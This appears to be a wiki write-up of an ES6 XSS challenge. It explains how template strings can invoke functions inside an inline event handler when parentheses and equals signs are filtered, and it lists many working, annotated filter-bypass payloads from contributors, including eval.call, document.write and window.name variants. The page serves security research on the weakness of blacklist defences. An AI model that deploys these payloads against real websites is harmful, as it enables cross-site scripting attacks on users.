-
Notifications
You must be signed in to change notification settings - Fork 221
ES6 Challenge
It is said that 2015 is the year of ES6. As browsers are starting to support more ES6 features, the attack vectors of XSS vary and the as-is defence (e.g. WAF, black-list filters) may not cover them. This challenge is created to see how many possibilities of ES6 there are: http://kcal.pw/es6challenge.php
As usual, the context is inline event handler. However, some critical tokens like open parenthesis, equal sign and ampersand are filtered. Previously, we can only perform XSS attack on MSIE in this scenario. However, it is no longer true with the introduction of template strings. It is also worth noting that the input is converted to lower case.
Although template strings give us alternative way to invoke functions, there are certain limitations:
- The first argument to the function call must be an array containing each sub-string
- The remaining arguments are the values of substitution expressions (if any)
...which means we cannot easily control what is passed to the function calls. This is a problem because normally we would like to pass string as the first parameter to execution sinks (e.g. eval, setTimeout). So anyway here it comes the submissions:
vbs:eval+nameA trivial solution with vbs. IE only
eval.call`${'alert\x28document.domain)'}`A model answer which makes use of the fact that Function.prototype.call takes the second parameter as the first parameter to the original function. The solution then escapes the equal sign in the string surrounded by a substitution expression. Note that @cgvwzq saved 1 char by replacing \x28 (hexadecimal escape) with \40 (octal escape)
document.write`${location.hash.slice`1`}`A solution which uses document.write and location.hash. There are room for improvements with scope magic (will explain it below)
eval.constructor`eval\x28name\x29```
eval.call`${location.hash.slice`1`}`Those are similar ideas as the above, except the sink and source chosen are sightly different
[].every.call`eval\x28name)${eval}`A very interesting solution which takes advantage of the way the callback of Array.prototype.every works. [].every can be replaced with [].map to save more chars.
open.constructor`eval\x28name)```ditto
eval.call`${location.pathname}`Yet another interesting solution which picks location.pathname as the source, so that the payload can be put into the path (e.g. /es6challenge.php/.source;alert(document.domain)?xss=)
eval.call`${window.name}`As you may have noticed, the submissions start to focus on using external source instead of putting the payload inside to save chars.
eval.call`${self.name}`ditto
eval.call`${top.name}`ditto
write`${self.name}`As previously mentioned, document.write can be replaced with write because in inline event handler the scope will include document
@steike, @insertScript, @freddyb, @shafigullin, @kinugawamasato, @OrenHafif, @mzyy94, @molnar_g (18)
write`${location}`
write`${top.name}`The shortest solutions submitted by challengers. The location being coerced to string is the same as document.URL. However certain characters (e.g. <, >) is encoded in URL on Firefox, while top.name is a more generic source
write`${top}`The shortest solution which abuses Symbol.toStringTag. When being coerced to string, the other frame's toString will be invoked and the result can be controlled using Symbol.toStringTag. This should be a new discovered source